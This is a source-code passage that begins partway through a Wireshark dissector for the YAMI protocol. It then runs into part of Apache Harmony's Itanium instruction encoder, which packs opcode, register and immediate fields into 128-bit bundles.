	ti = proto_tree_add_item(yami_tree, &hfi_yami_frame_number, tvb, offset, 4, ENC_LITTLE_ENDIAN);
	if(frame_number < 0)
		proto_item_append_text(ti, "%s", " (last frame)");
	offset += 4;

	message_header_size = tvb_get_letohl(tvb, offset);
	proto_tree_add_item(yami_tree, &hfi_yami_message_header_size, tvb, offset, 4, ENC_LITTLE_ENDIAN);
	if (message_header_size < 4) {
		/* XXX, expert info */
	}
	offset += 4;

	frame_payload_size = tvb_get_letohl(tvb, offset);
	ti = proto_tree_add_item(yami_tree, &hfi_yami_frame_payload_size, tvb, offset, 4, ENC_LITTLE_ENDIAN);
	frame_size = frame_payload_size + 16;
	proto_item_append_text(ti, ", (YAMI Frame Size: %d)", frame_size);
	offset += 4;

	/* parameter blocks appear only in the first (1) or only (-1) frame */
	if (frame_number == 1 || frame_number == -1) {
		if (message_header_size <= frame_payload_size) {
			const int orig_offset = offset;

			offset = dissect_yami_data(tvb, FALSE, yami_tree, offset);
			if (offset != orig_offset + message_header_size) {
				/* XXX, expert info */
				/* resynchronize on the declared header size */
				offset = orig_offset + message_header_size;
			}

			dissect_yami_data(tvb, TRUE, yami_tree, offset);
		}
	}

	return tvb_length(tvb);
}
/* a YAMI frame header is four 32-bit little-endian words */
#define FRAME_HEADER_LEN 16

/* tcp_dissect_pdus() length callback: the frame payload size sits at
 * header offset 12; the full PDU is payload plus the fixed header */
static guint
get_yami_message_len(packet_info *pinfo _U_, tvbuff_t *tvb, int offset)
{
	guint32 len = tvb_get_letohl(tvb, offset + 12);

	return len + FRAME_HEADER_LEN;
}
/* top-level dissector: let tcp_dissect_pdus() reassemble complete
 * YAMI frames (if enabled) and hand each one to dissect_yami_pdu() */
static int
dissect_yami(tvbuff_t *tvb, packet_info *pinfo, proto_tree *tree, void *data)
{
	tcp_dissect_pdus(tvb, pinfo, tree, yami_desegment, FRAME_HEADER_LEN, get_yami_message_len, dissect_yami_pdu, data);
	return tvb_length(tvb);
}
/*
 * Protocol registration: fields, subtrees, preferences and the
 * dissector handle. Called once at startup by the registration code.
 */
void
proto_register_yami(void)
{
#ifndef HAVE_HFI_SECTION_INIT
	static header_field_info *hfi[] = {
	/* Header */
		&hfi_yami_message_id,
		&hfi_yami_frame_number,
		&hfi_yami_message_header_size,
		&hfi_yami_frame_payload_size,
		&hfi_yami_message_hdr,
		&hfi_yami_message_data,
	/* Parameter */
		&hfi_yami_param,
		&hfi_yami_param_name,
		&hfi_yami_param_type,
		&hfi_yami_param_value_bool,
		&hfi_yami_param_value_int,
		&hfi_yami_param_value_long,
		&hfi_yami_param_value_double,
		&hfi_yami_param_value_str,
		&hfi_yami_param_value_bin,
		&hfi_yami_params_count,
		&hfi_yami_items_count,
	};
#endif

	static gint *ett[] = {
		&ett_yami,
		&ett_yami_msg_hdr,
		&ett_yami_msg_data,
		&ett_yami_param
	};

	module_t *yami_module;
	int proto_yami;

	proto_yami = proto_register_protocol("YAMI Protocol", "YAMI", "yami");
	hfi_yami = proto_registrar_get_nth(proto_yami);

	proto_register_fields(proto_yami, hfi, array_length(hfi));
	proto_register_subtree_array(ett, array_length(ett));

	/* port and reassembly preferences; changing a port re-runs
	 * proto_reg_handoff_yami() */
	yami_module = prefs_register_protocol(proto_yami, proto_reg_handoff_yami);
	prefs_register_uint_preference(yami_module, "tcp.port", "YAMI TCP Port", "The TCP port on which YAMI messages will be read(3000)", 10, &global_yami_config_tcp_port);
	prefs_register_uint_preference(yami_module, "udp.port", "YAMI UDP Port", "The UDP port on which YAMI messages will be read(5000)", 10, &global_yami_config_udp_port);
	prefs_register_bool_preference(yami_module, "desegment",
		"Reassemble YAMI messages spanning multiple TCP segments",
		"Whether the YAMI dissector should reassemble messages spanning multiple TCP segments."
		"To use this option, you must also enable \"Allow subdissectors to reassemble TCP streams\" in the TCP protocol settings.",
		&yami_desegment);

	yami_handle = new_create_dissector_handle(dissect_yami, proto_yami);
}
void
proto_reg_handoff_yami(void)
{
static int yami_prefs_initialized = FALSE;
static guint yami_tcp_port, yami_udp_port;
if(yami_prefs_initialized == FALSE){
yami_prefs_initialized = TRUE;
yami_tcp_port = global_yami_config_tcp_port;
yami_udp_port = global_yami_config_udp_port;
}else{
dissector_delete_uint("tcp.port", yami_tcp_port, yami_handle);
dissector_delete_uint("udp.port", yami_udp_port, yami_handle);
}
yami_tcp_port = global_yami_config_tcp_port;
yami_udp_port = global_yami_config_udp_port;
dissector_add_uint("tcp.port", yami_tcp_port, yami_handle);
dissector_add_uint("udp.port", yami_udp_port, yami_handle);
}
| gpl-2.0 |
skyHALud/codenameone | Ports/iOSPort/xmlvm/apache-harmony-6.0-src-r991881/drlvm/vm/vmcore/src/util/ipf/code_emit/merced.cpp | 2 | 54485 | /*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
/**
* @author Intel, Evgueni Brevnov
*/
//
// $Header: /cvs/drl/mrt/vm/vmcore/src/util/ipf/code_emit/merced.cpp,v 1.1.2.1.4.3 2006/03/28 15:08:51 aycherny Exp $
//
#include "open/types.h"
#include "merced.h"
// 20021204 Arrays tmplt_descr and IpfTemplInfo::info are a little
// different and they should be eventually merged.
// IPF dispersal template table, indexed by bundle template number 0x0..0xF.
// Each row lists the syllable type required in each of the three instruction
// slots; rows of ST_null correspond to reserved template encodings.
// NOTE(review): the two trailing integers appear to describe intra-bundle
// stop-bit placement -- confirm against the Template_Descr declaration.
Template_Descr tmplt_descr[] = {
    {{ST_m, ST_i, ST_i}, 3, 0},          // 0x0 .mii
    {{ST_m, ST_i, ST_i}, 2, 2},          // 0x1 .mi;i
    {{ST_m, ST_il, ST_null}, 3, 0},      // 0x2 .mxi (long immediate spans two slots)
    {{ST_null, ST_null, ST_null}, 3, 0}, // 0x3 reserved
    {{ST_m, ST_m, ST_i}, 3, 0},          // 0x4 .mmi
    {{ST_m, ST_m, ST_i}, 1, 1},          // 0x5 .m;mi
    {{ST_m, ST_f, ST_i}, 3, 0},          // 0x6 .mfi
    {{ST_m, ST_m, ST_f}, 3, 0},          // 0x7 .mmf
    {{ST_m, ST_i, ST_b}, 3, 0},          // 0x8 .mib
    {{ST_m, ST_b, ST_b}, 3, 0},          // 0x9 .mbb
    {{ST_null, ST_null, ST_null}, 3, 0}, // 0xA reserved
    {{ST_b, ST_b, ST_b}, 3, 0},          // 0xB .bbb
    {{ST_m, ST_m, ST_b}, 3, 0},          // 0xC .mmb
    {{ST_null, ST_null, ST_null}, 3, 0}, // 0xD reserved
    {{ST_m, ST_f, ST_b}, 3, 0},          // 0xE .mfb
    {{ST_null, ST_null, ST_null}, 3, 0}  // 0xF reserved
};
// Same template table as tmplt_descr above but carrying the printable
// template name instead of dispersal data (used for listings/debug output).
// NOTE(review): entry 0x3 is "bad1" without the leading dot while the other
// reserved entries are ".bad2"/".bad3"/".bad4" -- looks like a typo in the
// debug name, left unchanged since it is a runtime string.
IpfTemplInfo::TemplDesc IpfTemplInfo::info[] = {
    {{ST_m, ST_i, ST_i}, ".mii"},
    {{ST_m, ST_i, ST_i}, ".mi;i"},
    {{ST_m, ST_il, ST_null}, ".mxi"},
    {{ST_null, ST_null, ST_null}, "bad1"},
    {{ST_m, ST_m, ST_i}, ".mmi"},
    {{ST_m, ST_m, ST_i}, ".m;mi"},
    {{ST_m, ST_f, ST_i}, ".mfi"},
    {{ST_m, ST_m, ST_f}, ".mmf"},
    {{ST_m, ST_i, ST_b}, ".mib"},
    {{ST_m, ST_b, ST_b}, ".mbb"},
    {{ST_null, ST_null, ST_null}, ".bad2"},
    {{ST_b, ST_b, ST_b}, ".bbb"},
    {{ST_m, ST_m, ST_b}, ".mmb"},
    {{ST_null, ST_null, ST_null}, ".bad3"},
    {{ST_m, ST_f, ST_b}, ".mfb"},
    {{ST_null, ST_null, ST_null}, ".bad4"}
};
void Encoder_128::slot_reset(int slot_num, int offset, int bit_length) {
    // Clear bit_length bits starting at bit 'offset' of the given
    // instruction slot within the 128-bit bundle.  The three 41-bit slots
    // occupy bundle bits 5..45, 46..86 and 87..127; any other slot number
    // is silently ignored (as in the original switch with no default).
    static const unsigned slot_base[3] = { 5, 46, 87 };
    static const unsigned slot_top[3]  = { 45, 86, 127 };

    if (slot_num < 0 || slot_num > 2)
        return;

    unsigned lo = slot_base[slot_num] + offset;
    unsigned hi = lo + bit_length - 1;
    // The field must not spill past the end of the slot.  In release
    // builds the clear still proceeds, matching the original behavior.
    assert(hi <= slot_top[slot_num]);
    _reset_32(hi, lo);
}
void Encoder_128::_reset_32(unsigned left, unsigned right) {
    // Zero every bundle bit in the inclusive range [right, left].
    // Caller guarantees left >= right.  The original walked the range a
    // byte at a time building masks; clearing bit-by-bit leaves the
    // _char_value array in the identical final state.
    for (unsigned bit = right; bit <= left; ++bit) {
        _char_value[bit >> 3] &= ~(1u << (bit & 0x7));
    }
}
// Opcode_Encoder_offset9: builders for the opcode/extension fields of the
// IPF instruction formats (A/I/B/M/F, named after the format tables in the
// Itanium SDM vol 3).  Each method packs the format's fixed fields with
// encode(value, msb, lsb) -- the major opcode always in bits 40..37 --
// and returns the assembled fragment via emit().
unsigned Opcode_Encoder_offset9::A1_A2_A3_A4(unsigned opcode, unsigned x2a, unsigned ve, unsigned x4, unsigned x2b)
{
    encode(opcode, 40, 37);
    encode(x2a, 35, 34);
    encode(ve, 33, 33);
    encode(x4, 32, 29);
    encode(x2b, 28, 27);
    return emit();
}
unsigned Opcode_Encoder_offset9::A5_I15(unsigned opcode)
{
    // Formats with no extension fields: only the major opcode.
    encode(opcode, 40, 37);
    return emit();
}
unsigned Opcode_Encoder_offset9::A6_A7(unsigned opcode, unsigned tb, unsigned x2, unsigned ta, unsigned c)
{
    encode(opcode, 40, 37);
    encode(tb, 36, 36);
    encode(x2, 35, 34);
    encode(ta, 33, 33);
    encode(c, 12, 12);
    return emit();
}
unsigned Opcode_Encoder_offset9::A8(unsigned opcode, unsigned x2, unsigned ta, unsigned c)
{
    encode(opcode, 40, 37);
    encode(x2, 35, 34);
    encode(ta, 33, 33);
    encode(c, 12, 12);
    return emit();
}
unsigned Opcode_Encoder_offset9::I5_I7(unsigned opcode, unsigned za, unsigned x2a, unsigned zb, unsigned ve, unsigned x2c, unsigned x2b)
{
    encode(opcode, 40, 37);
    encode(za, 36, 36);
    encode(x2a, 35, 34);
    encode(zb, 33, 33);
    encode(ve, 32, 32);
    encode(x2c, 31, 30);
    encode(x2b, 29, 28);
    return emit();
}
unsigned Opcode_Encoder_offset9::I10_I11(unsigned opcode, unsigned x2, unsigned x, unsigned y)
{
    encode(opcode, 40, 37);
    encode(x2, 35, 34);
    encode(x, 33, 33);
    encode(y, 13, 13);
    return emit();
}
unsigned Opcode_Encoder_offset9::I12_I13_I14(unsigned opcode, unsigned x2, unsigned x, unsigned y)
{
    encode(opcode, 40, 37);
    encode(x2, 35, 34);
    encode(x, 33, 33);
    encode(y, 26, 26);
    return emit();
}
unsigned Opcode_Encoder_offset9::I18(unsigned opcode, unsigned vc)
{
    encode(opcode, 40, 37);
    encode(vc, 20, 20);
    return emit();
}
unsigned Opcode_Encoder_offset9::I19_I22_I25_I26_I27_I28_I29_M29_M31(unsigned opcode, unsigned x3, unsigned x6)
{
    encode(opcode, 40, 37);
    encode(x3, 35, 33);
    encode(x6, 32, 27);
    return emit();
}
unsigned Opcode_Encoder_offset9::I21(unsigned opcode, unsigned x3, unsigned ih, unsigned x, unsigned wh, unsigned p, unsigned pbtv)
{
    encode(opcode, 40, 37);
    encode(x3, 35, 33);
    encode(ih, 23, 23);
    encode(x, 22, 22);
    encode(wh, 21, 20);
    encode(p, 12, 12);
    encode(pbtv, 11, 9);
    return emit();
}
unsigned Opcode_Encoder_offset9::I20_I23_I24_M20_M21(unsigned opcode, unsigned x3)
{
    encode(opcode, 40, 37);
    encode(x3, 35, 33);
    return emit();
}
// NOTE(review): identical field layout to
// I19_I22_I25_I26_I27_I28_I29_M29_M31 above; kept for interface stability.
unsigned Opcode_Encoder_offset9::I25(unsigned opcode, unsigned x3, unsigned x6)
{
    encode(opcode, 40, 37);
    encode(x3, 35, 33);
    encode(x6, 32, 27);
    return emit();
}
unsigned Opcode_Encoder_offset9::B1_B2_B3_B4_B5(unsigned opcode, unsigned d, unsigned wh, unsigned p, unsigned x6)
{
    encode(opcode, 40, 37);
    encode(d, 35, 35);
    encode(wh, 34, 33);
    encode(p, 12, 12);
    encode(x6, 32, 27);
    return emit();
}
unsigned Opcode_Encoder_offset9::B8_B9(unsigned opcode, unsigned x6)
{
    encode(opcode, 40, 37);
    encode(x6, 32, 27);
    return emit();
}
unsigned Opcode_Encoder_offset9::M24_M25_M26_M27_M37(unsigned opcode, unsigned x3, unsigned x4, unsigned x2)
{
    encode(opcode, 40, 37);
    encode(x3, 35, 33);
    encode(x2, 32, 31);
    encode(x4, 30, 27);
    return emit();
}
// NOTE(review): exact duplicate of M24_M25_M26_M27_M37 above; both are kept
// because callers outside this chunk may reference either name.
unsigned Opcode_Encoder_offset9::M24_M25_M26_M37(unsigned opcode, unsigned x3, unsigned x4, unsigned x2)
{
    encode(opcode, 40, 37);
    encode(x3, 35, 33);
    encode(x2, 32, 31);
    encode(x4, 30, 27);
    return emit();
}
unsigned Opcode_Encoder_offset9::F15(unsigned opcode, unsigned x, unsigned x6)
{
    encode(opcode, 40, 37);
    encode(x, 33, 33);
    encode(x6, 32, 27);
    return emit();
}
unsigned Opcode_Encoder_offset9::M1_M2_M4_M6_M7_M9_M11_M12_M13_M14_M16_M17(unsigned opcode, unsigned x6, unsigned hint, unsigned x, unsigned m)
{
    encode(opcode, 40, 37);
    encode(m, 36, 36);
    encode(x6, 35, 30);
    encode(hint, 29, 28);
    encode(x, 27, 27);
    return emit();
}
unsigned Opcode_Encoder_offset9::M3_M5_M8_M10_M15(unsigned opcode, unsigned x6, unsigned hint)
{
    encode(opcode, 40, 37);
    encode(x6, 35, 30);
    encode(hint, 29, 28);
    return emit();
}
unsigned Opcode_Encoder_offset9::M18_M19(unsigned opcode, unsigned m, unsigned x6, unsigned x)
{
    encode(opcode, 40, 37);
    encode(m, 36, 36);
    encode(x6, 35, 30);
    encode(x, 27, 27);
    return emit();
}
unsigned Opcode_Encoder_offset9::M20_M21_M22_M23_M34(unsigned opcode, unsigned x3)
{
    encode(opcode, 40, 37);
    encode(x3, 35, 33);
    return emit();
}
unsigned Opcode_Encoder_offset9::F1_F2_F3(unsigned opcode, unsigned x, unsigned sf_x2)
{
    encode(opcode, 40, 37);
    encode(x, 36, 36);
    encode(sf_x2, 35, 34);
    return emit();
}
unsigned Opcode_Encoder_offset9::F4(unsigned opcode, unsigned rb, unsigned sf, unsigned ra, unsigned ta)
{
    encode(opcode, 40, 37);
    encode(rb, 36, 36);
    encode(sf, 35, 34);
    encode(ra, 33, 33);
    encode(ta, 12, 12);
    return emit();
}
unsigned Opcode_Encoder_offset9::F5(unsigned opcode, unsigned fc2, unsigned fclass7c, unsigned ta)
{
    encode(opcode, 40, 37);
    encode(fc2, 34, 33);
    encode(fclass7c, 26, 20);
    encode(ta, 12, 12);
    return emit();
}
unsigned Opcode_Encoder_offset9::F6(unsigned opcode, unsigned q, unsigned sf, unsigned x)
{
    encode(opcode, 40, 37);
    encode(q, 36, 36);
    encode(sf, 35, 34);
    encode(x, 33, 33);
    return emit();
}
unsigned Opcode_Encoder_offset9::F8_F9_F10_F11_F12_F13(unsigned opcode, unsigned x, unsigned x6, unsigned sf)
{
    encode(opcode, 40, 37);
    encode(sf, 35, 34);
    encode(x, 33, 33);
    encode(x6, 32, 27);
    return emit();
}
// Register_Encoder_offset6: packers for the register fields of IPF
// instructions.  Field positions are fixed by the instruction formats:
// r1 (destination) in bits 12..6, r2 in 19..13, r3 in 26..20, predicate
// targets p1 in 11..6 and p2 in 32..27, branch registers b1 in 8..6 and
// b2 in 15..13.  Each method writes its fields and returns emit().
unsigned Register_Encoder_offset6::R3_R2_R1(unsigned r3, unsigned r2, unsigned r1)
{
    encode(r3, 26, 20);
    encode(r2, 19, 13);
    encode(r1, 12, 6);
    return emit();
}
unsigned Register_Encoder_offset6::R3_R1(unsigned r3, unsigned r1)
{
    encode(r3, 26, 20);
    encode(r1, 12, 6);
    return emit();
}
unsigned Register_Encoder_offset6::R2_R1(unsigned r2, unsigned r1)
{
    encode(r2, 19, 13);
    encode(r1, 12, 6);
    return emit();
}
unsigned Register_Encoder_offset6::R3_R2(unsigned r3, unsigned r2)
{
    encode(r3, 26, 20);
    encode(r2, 19, 13);
    return emit();
}
unsigned Register_Encoder_offset6::cR3_R1(unsigned r3, unsigned r1)
{
    // Short (2-bit) r3 field, bits 21..20.
    encode(r3, 21, 20);
    encode(r1, 12, 6);
    return emit();
}
unsigned Register_Encoder_offset6::R1(unsigned r1)
{
    encode(r1, 12, 6);
    return emit();
}
unsigned Register_Encoder_offset6::R2(unsigned r2)
{
    encode(r2, 19, 13);
    return emit();
}
unsigned Register_Encoder_offset6::R3(unsigned r3)
{
    encode(r3,26,20);
    return emit();
}
unsigned Register_Encoder_offset6::P2_P1_R3_R2(unsigned p2, unsigned p1, unsigned r3, unsigned r2)
{
    encode(p2, 32, 27);
    encode(p1, 11, 6);
    encode(r3, 26, 20);
    encode(r2, 19, 13);
    return emit();
}
unsigned Register_Encoder_offset6::P2_P1_R3(unsigned p2, unsigned p1, unsigned r3)
{
    encode(p2, 32, 27);
    encode(p1, 11, 6);
    encode(r3, 26, 20);
    return emit();
}
unsigned Register_Encoder_offset6::B2_B1(unsigned b2, unsigned b1)
{
    encode(b2, 15, 13);
    encode(b1, 8, 6);
    return emit();
}
unsigned Register_Encoder_offset6::B1(unsigned b1)
{
    encode(b1, 8, 6);
    return emit();
}
unsigned Register_Encoder_offset6::I20_M20_M21(unsigned r2) {
    // Speculation-check formats carry only the checked register in 19..13.
    encode(r2,19,13);
    return emit();
}
unsigned Register_Encoder_offset6::F4_F3_F2_F1(unsigned f4, unsigned f3, unsigned f2, unsigned f1)
{
    encode(f4, 33, 27);
    encode(f3, 26, 20);
    encode(f2, 19, 13);
    encode(f1, 12, 6);
    return emit();
}
unsigned Register_Encoder_offset6::P2_P1_F3_F2(unsigned p2, unsigned p1, unsigned f3, unsigned f2)
{
    encode(p2, 32, 27);
    encode(p1, 11, 6);
    encode(f3, 26, 20);
    encode(f2, 19, 13);
    return emit();
}
unsigned Register_Encoder_offset6::P2_P1_F2(unsigned p2, unsigned p1, unsigned f2)
{
    encode(p2, 32, 27);
    encode(p1, 11, 6);
    encode(f2, 19, 13);
    return emit();
}
unsigned Register_Encoder_offset6::F3_F2_F1(unsigned f3, unsigned f2, unsigned f1)
{
    encode(f3, 26, 20);
    encode(f2, 19, 13);
    encode(f1, 12, 6);
    return emit();
}
unsigned Register_Encoder_offset6::P2_F3_F2_F1(unsigned p2, unsigned f3, unsigned f2, unsigned f1)
{
    encode(p2, 32, 27);
    encode(f3, 26, 20);
    encode(f2, 19, 13);
    encode(f1, 12, 6);
    return emit();
}
unsigned Register_Encoder_offset6::F2_F1(unsigned f2, unsigned f1)
{
    encode(f2, 19, 13);
    encode(f1, 12, 6);
    return emit();
}
unsigned Register_Encoder_offset6::B2_R1(unsigned b2, unsigned r1)
{
    encode(b2, 15, 13);
    encode(r1, 12, 6);
    return emit();
}
unsigned Register_Encoder_offset6::R2_B1(unsigned r2, unsigned b1)
{
    encode(r2, 19, 13);
    encode(b1, 8, 6);
    return emit();
}
// Immediate_Encoder_offset6: packers for the immediate fields of IPF
// instructions.  Each method's header comment gives the SDM formula that
// relates the logical immediate to the scattered encoded sub-fields
// (sign bit, chunks, biased counts).  Methods taking an IP parameter
// encode IP-relative displacements (shifted right 4 -- bundle-aligned).
unsigned Immediate_Encoder_offset6::A2(unsigned count2)
{
    // count2 = ct2d + 1  (field stores the count minus one)
    encode(count2 - 1, 28, 27);
    return emit();
}
unsigned Immediate_Encoder_offset6::A3_A8_I27_M30(unsigned imm8)
{
    // imm8 = sign_ext(s<<7 | imm7b, 8)
    encode((0x80 & imm8) >> 7, 36, 36);
    encode((0x7F & imm8), 19, 13);
    return emit();
}
unsigned Immediate_Encoder_offset6::A4(unsigned imm14)
{
    // imm14 = sign_ext(s<<13 | imm6d<<7 | imm7b, 14)
    encode((0x2000 & imm14) >> 13, 36, 36);
    encode((0x1F80 & imm14) >> 7, 32, 27);
    encode((0x7F & imm14), 19, 13);
    return emit();
}
unsigned Immediate_Encoder_offset6::A5(unsigned imm22)
{
    // imm22 = sign_ext(s<<21 | imm5c<<16 | imm9d<<7 | imm7b, 22)
    encode((0x200000 & imm22) >> 21, 36, 36);
    encode((0x1F0000 & imm22) >> 16, 26, 22);
    encode((0xFF80 & imm22) >> 7, 35, 27);
    encode((0x7F & imm22), 19, 13);
    return emit();
}
unsigned Immediate_Encoder_offset6::I6(unsigned count5)
{
    // count5 = count5b
    encode(count5, 18, 14);
    return emit();
}
unsigned Immediate_Encoder_offset6::I8(unsigned count5)
{
    // count5 = 31 - ccount5c  (field stores the complemented count)
    encode(31-count5, 24, 20);
    return emit();
}
unsigned Immediate_Encoder_offset6::I10(unsigned count6)
{
    // count6 = count6d
    encode(count6, 32, 27);
    return emit();
}
unsigned Immediate_Encoder_offset6::I11(unsigned len6, unsigned pos6)
{
    // len6 = len6d + 1
    // pos6 = pos6b
    encode(len6 - 1, 32, 27);
    encode(pos6, 19, 14);
    return emit();
}
unsigned Immediate_Encoder_offset6::I12(unsigned len6, unsigned pos6)
{
    // len6 = len6d + 1
    // pos6 = 63 - cpos6c  (position stored complemented)
    encode(len6 - 1, 32, 27);
    encode(63 - pos6, 25, 20);
    return emit();
}
unsigned Immediate_Encoder_offset6::I13(unsigned len6, unsigned pos6, unsigned imm8)
{
    // len6 = len6d + 1
    // pos6 = 63 - cpos6c
    // imm8 = sign_ext(s<<7|imm7b,8)
    encode(len6 - 1, 32, 27);
    encode(63 - pos6, 25, 20);
    encode((0x80 & imm8) >> 7, 36, 36);
    encode((0x7F & imm8), 19, 13);
    return emit();
}
unsigned Immediate_Encoder_offset6::I14(unsigned len6, unsigned pos6, unsigned imm1)
{
    // len6 = len6d + 1
    // pos6 = 63 - cpos6b
    // imm1 = sign_ext(s,1)
    encode(len6 - 1, 32, 27);
    encode(63 - pos6, 19, 14);
    encode(0x1 & imm1, 36, 36);
    return emit();
}
unsigned Immediate_Encoder_offset6::I15(unsigned len4, unsigned pos6)
{
    // len4 = len4d + 1
    // pos6 = 63 - cpos6d
    encode(len4 - 1, 30, 27);
    encode(63 - pos6, 36, 31);
    return emit();
}
unsigned Immediate_Encoder_offset6::I18(unsigned upper_32, unsigned lower_32)
{
    // movl immediate: the 64-bit value is split between this slot and the
    // preceding long-immediate slot (see Merced_Encoder::encode_long).
    // imm64 = i << 63 | imm41<<22 | ic<<21 | imm5c<<16 | imm9d<<7 | imm7b
    encode((0x80000000 & upper_32) >> 31, 36, 36);
    encode((0x200000 & lower_32) >> 21, 21, 21);
    encode((0x1F0000 & lower_32) >> 16, 26, 22);
    encode((0xFF80 & lower_32) >> 7, 35, 27);
    encode((0x7F & lower_32), 19, 13);
    return emit();
}
unsigned Immediate_Encoder_offset6::I21(unsigned tag13, unsigned IP)
{
    // tag13 = IP + (sign_ext(timm9c, 9) << 4)
    unsigned imm9 = (tag13-IP) >> 4;
    encode((0x1FF & imm9), 32, 24);
    return emit();
}
unsigned Immediate_Encoder_offset6::I23(unsigned mask17)
{
    // mask17 = sign_ext(s<<16 | mask8c<<8 | mask7a<<1, 17)
    encode((0x10000 & mask17) >> 16, 36, 36);
    encode((0xFF00 & mask17) >> 8, 31, 24);
    encode((0x00FE & mask17) >> 1, 12, 6);
    return emit();
}
unsigned Immediate_Encoder_offset6::I24(unsigned imm28)
{
    // imm44 = imm28 << 16
    // imm44 = sign_ext(s<<43 | imm27a <<16, 44)
    encode((0x8000000 & imm28) >> 27, 36, 36);
    encode((0x7FFFFFF & imm28), 32, 6);
    return emit();
}
unsigned Immediate_Encoder_offset6::M3_M8_M15(unsigned imm9)
{
    // imm9 = sign_ext(s<<8 | i<<7 | imm7b, 9)
    encode((0x100 & imm9) >> 8, 36, 36);
    encode((0x80 & imm9) >> 7, 27, 27);
    encode((0x7F & imm9), 19, 13);
    return emit();
}
unsigned Immediate_Encoder_offset6::M5_M10(unsigned imm9)
{
    // imm9 = sign_ext(s<<8 | i<<7 | imm7a, 9)
    encode((0x100 & imm9) >> 8, 36, 36);
    encode((0x80 & imm9)>> 7, 27, 27);
    encode((0x7F & imm9), 12, 6);
    return emit();
}
unsigned Immediate_Encoder_offset6::M34(unsigned il, unsigned o, unsigned r)
{
    // alloc frame layout:
    // il = sol (size of locals)
    // o  = sof - sol (outputs)
    // r  = sor << 3 (rotating, stored divided by 8)
    encode(il, 26, 20);
    encode(il+o, 19, 13);
    encode(r >> 3, 30, 27);
    return emit();
}
unsigned Immediate_Encoder_offset6::B1_B2_B3(unsigned target25, unsigned IP)
{
    // target25 = IP + (sign_ext(s<<20 | imm20b, 21) << 4)
    unsigned imm21 = (target25-IP) >> 4;
    encode((0x100000 & imm21) >> 20, 36, 36);
    encode((0xFFFFF & imm21), 32, 13);
    return emit();
}
unsigned Immediate_Encoder_offset6::I20_M20_M21(unsigned target25, unsigned IP)
{
    // Same IP-relative form as B1_B2_B3 but with the 20 low bits split
    // across two fields (speculation-check formats).
    unsigned imm21 = (target25-IP) >> 4;
    encode ((0x100000 & imm21) >> 20, 36, 36);
    encode ((0x0fff80 & imm21) >> 7, 32, 20);
    encode ((0x00007f & imm21), 12, 6);
    return emit();
}
unsigned Immediate_Encoder_offset6::I19_M37_B9_F15(unsigned imm21)
{
    // imm21 = i << 20 | imm20a  (nop/break immediate)
    encode((0x100000 & imm21) >> 20, 36, 36);
    encode((0xFFFFF & imm21), 25, 6);
    return emit();
}
void Merced_Encoder::encode(unsigned opcode9, unsigned imm6, unsigned reg6, unsigned qp)
{
    // Deposit one complete instruction into the next free bundle slot.
    // The three fragments built by the opcode/immediate/register encoders
    // are laid down at their fixed offsets; slot_encode(slot, value,
    // offset, length).  The qualifying predicate occupies bits 5..0.
    assert(slot_num < 3);
    slot_encode(slot_num, opcode9, 9, 32); // bits 40..9
    slot_encode(slot_num, imm6, 6, 31); // bits 36..6
    slot_encode(slot_num, reg6, 6, 28); // bits 33..6
    slot_encode(slot_num, qp, 0, 6); // qp, default to 0
    slot_num++;
}
void Merced_Encoder::encode_long(unsigned opcode9, unsigned imm6, unsigned imm31x, unsigned imm10x,
unsigned reg6, unsigned qp)
{
    // Deposit a long-immediate (X-unit) instruction, which consumes two
    // slots: the instruction proper goes in slot_num+1 and the extra
    // immediate bits (imm41 of movl) fill slot_num.
    assert(slot_num < 2);
    slot_encode(slot_num+1, opcode9, 9, 32); // bits 40..9
    slot_encode(slot_num+1, imm6, 6, 31); // bits 36..6
    slot_encode(slot_num+1, reg6, 6, 27); // bits 32..6
    slot_encode(slot_num+1, qp, 0, 6); // qp, default to 0
    slot_encode(slot_num, imm31x, 10, 31); // high chunk of the long immediate
    slot_encode(slot_num, imm10x, 0, 10); // low chunk of the long immediate
    slot_num += 2;
}
// The section numbers below (x.x.x.x and x.x.x) refer to the Intel
// Itanium Architecture Software Developer's Manual, volume 3, revision 2.1,
// October 2002.
// Emit a long-branch/long-call instruction (formats X3/X4): a 64-bit
// IP-relative displacement split into i (1 bit), imm39 and imm20b,
// plus branch hints and the branch register for calls.
void Merced_Encoder::encode_long_X3_X4(unsigned opcode4,
Branch_Prefetch_Hint ph,
Branch_Whether_Hint wh,
Branch_Dealloc_Hint dh,
unsigned b,
unsigned i,
uint64 imm39,
unsigned imm20b,
unsigned qp)
{ // 4.7.3
    assert(slot_num < 2);
    int slot1 = slot_num + 1;
    int slot2 = slot_num;
    slot_encode(slot1, opcode4, 37, 4); // 37..40
    slot_encode(slot1, i, 36, 1); // 36..36
    slot_encode(slot1, dh, 35, 1); // 35..35
    slot_encode(slot1, wh, 33, 2); // 33..34
    slot_encode(slot1, imm20b, 13, 20); // 13..32
    slot_encode(slot1, ph, 12, 1); // 12..12
    slot_encode(slot1, b, 6, 3); // 6..8
    slot_encode(slot1, qp, 0, 6); // qp
    // Encode imm39 in two chunks since slot_encode can't take a 64-bit
    // constant as an argument.
    slot_encode(slot2, (unsigned)((imm39 >> 19) & 0xFffFF), 21, 20);
    slot_encode(slot2, (unsigned)(imm39 & 0x7ffFF), 2, 19);
    slot_num += 2;
} //Merced_Encoder::encode_long_X3_X4
void Merced_Encoder::ipf_nop(EM_Syllable_Type tv, unsigned imm21)
{
    // Emit a nop of the requested execution-unit type (M/I/F/B) carrying
    // a 21-bit payload immediate.  Each unit uses its own nop format.
    assert(imm21 < 1u<<21);
    switch (tv)
    {
    case ST_m:
        encode( // 4.4.9.4
            opc_enc.M24_M25_M26_M37(0, 0, 1, 0),
            imm_enc.I19_M37_B9_F15(imm21),
            0
        );
        break;
    case ST_i:
        encode( // 4.4.9.4
            opc_enc.I19_I22_I25_I26_I27_I28_I29_M29_M31(0, 0, 1),
            imm_enc.I19_M37_B9_F15(imm21),
            0
        );
        break;
    case ST_f:
        encode( // 4.6.9.1
            opc_enc.F15(0, 0, 1),
            imm_enc.I19_M37_B9_F15(imm21),
            0
        );
        break;
    case ST_b:
